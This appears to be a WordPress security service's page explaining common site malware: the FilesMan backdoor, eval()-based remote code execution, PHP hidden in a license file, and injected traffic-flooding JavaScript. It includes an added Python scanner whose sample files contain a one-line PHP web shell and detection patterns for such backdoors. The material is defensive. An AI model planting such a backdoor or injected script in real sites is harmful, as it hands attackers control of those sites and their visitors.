Some common Malware for reference

FilesMan

FilesMan is a backdoor which allows unauthorized access/creation/modification of your website files via PHP requests.

We have seen countless variants of FilesMan. One of them is shown below for reference.

FilesMan

Remote Arbitrary Code Execution

The left-hand-side image shows a piece of hidden code.  If we decode it, it means –

malware_remote_code_exec_detail

eval() evaluates a string as PHP code, i.e. it executes the string's content.

This is evidently a tool for remote arbitrary code execution.
Any PHP commands passed to nf0b08a via an HTTP POST request will be executed.
(HTTP POST is a very common request type in everyday use, e.g. submitting a username/password to log in.)

Remote Arbitrary Code execution

Remote Arbitrary Code Execution (more complex)

A much more complex remote arbitrary code execution malware

Remote Arbitrary Code execution

Hidden Malware

Some malware is hidden in what appears to be a plain text file (e.g. a license file).
(There are other malicious PHP commands in other sections of the example file.)

malicious PHP commands hidden in apparent license file
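A defender can sweep a site's files for the two patterns described above: eval() fed from request input or from a decoded string, and PHP code sitting in a file that is not supposed to be PHP. The following scanner is an added example, not code from RecoverWP.com; the rule names, the extension list and the sample files are assumptions constructed for illustration, and the heuristics are not exhaustive.

```python
import os
import re
import tempfile

# Heuristic patterns for the behaviours described above (assumed, not exhaustive).
RULES = {
    "eval-on-request-input": re.compile(
        r"\beval\s*\(\s*[^;]{0,200}\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    "eval-on-decoded-string": re.compile(
        r"\beval\s*\(\s*[^;]{0,200}\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}
PHP_TAG = re.compile(r"<\?(php|=)", re.I)
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}

def scan_text(name, text):
    """Return the sorted rule names that match one file's content."""
    hits = {rule for rule, rx in RULES.items() if rx.search(text)}
    ext = os.path.splitext(name)[1].lower()
    if ext not in PHP_EXTENSIONS and PHP_TAG.search(text):
        hits.add("php-in-non-php-file")  # e.g. PHP inside a license file
    return sorted(hits)

def scan_tree(root):
    """Walk root and return {relative path: [rule names]} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            with open(path, encoding="latin-1") as fh:  # latin-1 never fails to decode
                hits = scan_text(fname, fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings

# Constructed sample files (not taken from the page's screenshots).
SAMPLES = {
    "clean.php": "<?php echo 'hello'; ?>",
    "license.txt": "GNU GPL ...\n<?php eval($_POST['nf0b08a']); ?>\n",
    "cache.php": "<?php eval(base64_decode('ZWNobyAxOw==')); ?>",
}

def demo():
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    print(demo())
```

A hit is a reason to inspect the file by hand, not proof of infection; some legitimate plugins also call eval().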

Excessive Traffic

The image shows code injected into wp_content/themes/xxxx/header.php.

This JavaScript is delivered to your WordPress website visitors’ browsers (as part of the theme content).

According to the code, the visitor's browser requests the URL http://www.ac???.e?/js/… every 10 seconds, generating unnecessary and excessive traffic to the victim website.

When this malware is widely distributed, it generates a large amount of excessive traffic against the victim website, and may make the victim website's server slow or even inaccessible.
(In the example, the victim website is www.ac???.e?.)

Generate excessive traffic against victim website

About RecoverWP.com

RecoverWP.com is managed by web hosting professionals who have been working in web hosting, WordPress websites, security and vulnerabilities since 2003.

Contact: (852) 3502-4863 | Email: support@recoverwp.com
Copyright 2015-2019 (c) Website Maintenance Service Limited
